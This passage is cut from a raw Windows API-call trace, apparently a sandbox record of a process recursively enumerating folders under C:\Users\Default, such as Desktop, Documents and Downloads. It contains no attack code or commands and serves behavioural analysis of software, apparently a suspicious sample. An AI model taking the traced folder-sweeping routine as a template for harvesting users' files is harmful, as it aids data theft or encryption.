ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0072.048] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0072.048] GetProcessHeap () returned 0xe30000 [0072.048] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf510 | out: hHeap=0xe30000) returned 1 [0072.048] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0072.048] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0072.048] GetProcessHeap () returned 0xe30000 [0072.049] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.049] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.049] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0072.049] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0072.049] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0072.049] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0072.049] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0072.049] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0072.049] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0072.049] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0072.049] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.049] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.049] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Desktop", cchMax=1058 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0072.049] GetProcessHeap () returned 0xe30000 [0072.049] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xece048 [0072.049] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Desktop", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0072.049] StrNCatW (in: psz1="C:\\Users\\Default\\Desktop", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0072.049] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0072.049] StrCmpW (psz1=".", psz2=".") returned 0 [0072.049] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.049] StrCmpW (psz1="..", psz2=".") returned 1 [0072.049] StrCmpW (psz1="..", psz2="..") returned 0 [0072.050] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.050] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0072.050] GetProcessHeap () returned 0xe30000 [0072.050] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.050] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0072.050] StrCmpW (psz1="Documents", psz2=".") returned 1 [0072.050] StrCmpW (psz1="Documents", psz2="..") returned 1 [0072.050] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.050] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.050] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Documents", cchMax=1058 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0072.050] GetProcessHeap () returned 0xe30000 [0072.050] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xece048 [0072.050] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Documents", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0072.050] StrNCatW (in: psz1="C:\\Users\\Default\\Documents", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0072.050] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0072.053] StrCmpW (psz1=".", psz2=".") returned 0 [0072.053] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.053] StrCmpW (psz1="..", psz2=".") returned 1 [0072.053] StrCmpW (psz1="..", psz2="..") returned 0 [0072.053] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0072.053] StrCmpW (psz1="My Music", psz2=".") returned 1 [0072.053] StrCmpW (psz1="My Music", psz2="..") returned 1 [0072.053] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0072.053] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0072.053] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0072.053] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0072.053] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0072.053] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0072.053] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0072.053] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0072.054] GetProcessHeap () returned 0xe30000 [0072.054] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.054] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0072.054] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0072.054] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0072.054] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.054] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.054] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Downloads", cchMax=1058 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0072.054] GetProcessHeap () returned 0xe30000 [0072.054] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xece048 [0072.054] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Downloads", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0072.054] StrNCatW (in: psz1="C:\\Users\\Default\\Downloads", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0072.054] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0072.054] StrCmpW (psz1=".", psz2=".") returned 0 [0072.054] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.055] StrCmpW (psz1="..", psz2=".") returned 1 [0072.055] StrCmpW (psz1="..", psz2="..") returned 0 [0072.055] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.055] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0072.055] GetProcessHeap () returned 0xe30000 [0072.055] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.055] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0072.055] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0072.055] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0072.055] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.055] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.055] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Favorites", cchMax=1058 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0072.055] GetProcessHeap () returned 0xe30000 [0072.055] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xece048 [0072.055] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Favorites", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0072.055] StrNCatW (in: psz1="C:\\Users\\Default\\Favorites", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0072.055] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0072.056] StrCmpW (psz1=".", psz2=".") returned 0 [0072.056] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.056] StrCmpW (psz1="..", psz2=".") returned 1 [0072.056] StrCmpW (psz1="..", psz2="..") returned 0 [0072.056] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.056] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0072.056] GetProcessHeap () returned 0xe30000 [0072.056] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.056] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0072.056] StrCmpW (psz1="Links", psz2=".") returned 1 [0072.056] StrCmpW (psz1="Links", psz2="..") returned 1 [0072.056] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.056] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.056] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Links", cchMax=1058 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0072.056] GetProcessHeap () returned 0xe30000 [0072.056] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xece048 [0072.056] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Links", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0072.056] StrNCatW (in: psz1="C:\\Users\\Default\\Links", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0072.056] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0072.057] StrCmpW (psz1=".", psz2=".") returned 0 [0072.057] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.057] StrCmpW (psz1="..", psz2=".") returned 1 [0072.057] StrCmpW (psz1="..", psz2="..") returned 0 [0072.057] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.057] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0072.057] GetProcessHeap () returned 0xe30000 [0072.057] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.057] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0072.057] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0072.057] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0072.057] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0072.057] StrCmpW (psz1="Music", psz2=".") returned 1 [0072.057] StrCmpW (psz1="Music", psz2="..") returned 1 [0072.057] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.057] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.057] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Music", cchMax=1058 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0072.057] GetProcessHeap () returned 0xe30000 [0072.057] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xece048 [0072.057] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Music", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0072.057] StrNCatW (in: psz1="C:\\Users\\Default\\Music", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0072.057] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec27f0 [0072.099] StrCmpW (psz1=".", psz2=".") returned 0 [0072.099] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, 